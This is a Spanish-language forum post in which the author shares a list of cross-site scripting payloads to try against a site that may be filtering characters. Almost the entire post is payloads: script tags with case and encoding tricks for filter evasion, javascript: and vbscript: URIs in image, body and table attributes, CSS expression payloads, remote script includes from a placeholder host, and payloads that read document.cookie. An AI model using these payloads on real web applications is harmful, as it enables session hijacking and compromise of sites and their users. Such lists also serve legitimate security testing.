Hola, a lo mejor se pueden estar filtrando algunos caracteres para evitar el XSS.
Una vez alguien del foro que no recuerdo dejo una lista de codigos para SQL injection y me sirvio bastante.
Asi que dejo mi lista para XSS.
Prueba estos:
>"><ScRiPt%20%0a%0d>alert(1446033991)%3B</ScRiPt>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="javascript
:alert('PLAYH
ACK.NET')">
<IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">
<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<iframe src=http://example.com/scriptlet.html <
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert(document.cookie)>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<BR SIZE="&{alert('XSS')}">
<IMG SRC='vbscript:msgbox("XSS")'>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="width: expression(alert('XSS'));">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<A HREF="javascript:document.location='http://www.example.com/'">XSS</A>
···FROM PROVENTIA···
-->//"><script>alert(/XSS%20vulnerability%20proventia%20s0x by Alex Hernandez/);</script>
-->//"><script>alert(document.cookie)</script>
-->//"><script>alert(document.domain)</script>
Saludos.